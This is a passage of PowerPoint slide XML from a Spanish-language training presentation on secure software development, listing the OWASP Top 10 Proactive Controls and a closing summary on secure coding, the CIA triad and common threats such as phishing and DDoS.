                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>identidad digital</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>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0873908"/>
                  </a:ext>
                </a:extLst>
              </a:tr>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solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Aprovechar los </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>frameworks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> y librerías </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>de seguridad.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s-ES" sz="1600" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Aplicar </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>controles de acceso</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>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7960784"/>
                  </a:ext>
                </a:extLst>
              </a:tr>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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Acceso seguro a la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>base de datos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>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s-ES" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Proteger los </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>datos en todas partes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>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7295138"/>
                  </a:ext>
                </a:extLst>
              </a:tr>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b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Codificación y escape </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>de datos.</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B0603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s-ES" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Implementar el </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>registro </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>y la supervisión de la seguridad.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9775845"/>
                  </a:ext>
                </a:extLst>
              </a:tr>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b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Validación</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> de todas las entradas.</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B0603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s-ES" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Gestionar todos los </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>errores y excepciones</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>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3817066"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7055B6B2-2833-7551-72CF-F82940F40E60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396334" y="1972877"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FC7452A-58F4-2E95-5D90-65605FB1675F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396334" y="2795414"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C67F6B4D-52C0-4E61-5C0C-F9E8474FE9BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396334" y="3603207"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8915DD38-15B5-AE9B-1E45-6E90E05F4033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396334" y="4373911"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD0787D-E334-67C3-DEC1-D46FC77E10D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396334" y="5168185"/>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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A40ACF45-94DC-2FB5-E0B6-E6721A579243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6302919" y="1972877"/>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6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C123D92-0D27-6C64-0A7A-A97537076641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6302919" y="2748268"/>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7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1E73E4-E595-546B-C144-41D63E8C592F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6302919" y="3603207"/>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8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A713CE24-E580-1E0D-B4B4-A41893B56A53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6302919" y="4373911"/>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9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44B8075F-068E-D27A-51C7-54398FA5F143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272033" y="5168185"/>
            <a:ext cx="550860"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500" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32AE23A8-CACA-85BE-0847-3618756CEAB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382948" y="5883167"/>
            <a:ext cx="3609219" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referencia: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" i="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>OWASP Top 10 Proactive Controls 2018</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Imagen 12" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6F03C0-27EE-8FD6-5523-360F68E4260A}"/>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7623386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C6CA44A-08B2-A56A-6A92-A28D22871A90}"/>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01F690DB-2C47-F000-4216-886DDEC25641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7125"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559BDFD-87BF-83CA-A2B7-1876EA169ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258892" y="2687716"/>
            <a:ext cx="5951410" cy="150810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8.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIERRE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF95AF0A-0B2C-2044-DD70-2526334DEE0B}"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Conector recto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{062DDE0E-1625-3A3F-D527-0F32870D956B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5648220" y="6004858"/>
            <a:ext cx="6062472" cy="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02020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EE39F-F08F-A143-3DA8-092D0BDC529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F599963-EDEB-6353-7288-4E23423C3DFE}"/>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43A4806-1470-25C5-1004-3AC79F399CC7}"/>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Resumen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB6F9C0D-966A-95C5-FFC2-BBED700AA05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2" name="CuadroTexto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59BBAFB7-A431-B0F3-E846-FCB0135A4ACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2373106" y="1289182"/>
            <a:ext cx="33073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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La programación segura hace que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>disminuyan las vulnerabilidades.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="CuadroTexto 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4907B42B-7ABA-7EBA-967C-31C8B1F397D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2373106" y="2911929"/>
            <a:ext cx="33073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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>confidencialidad, la integridad y la disponibilidad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>son los pilares básicos de la seguridad de la información.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="CuadroTexto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD6591B8-1C0A-BFC0-446B-26B7FF4A3148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2312526" y="4942880"/>
            <a:ext cx="33679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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Entre las amenazas más comunes pueden estar el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>phishing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>MiTM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>,…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CuadroTexto 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F843A50-1FDC-0E73-9313-F4646E30D6CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7584770" y="1279224"/>
            <a:ext cx="37040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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>El desarrollo seguro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>no implica nuevas fases sino incorporar buenas prácticas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>en SDLC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> DevOps.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="CuadroTexto 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E0C066C-95D6-EC7F-376B-7E05EE31E41F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7584698" y="3228821"/>
            <a:ext cx="37040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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>arquitectura es primordial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>en la seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="CuadroTexto 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
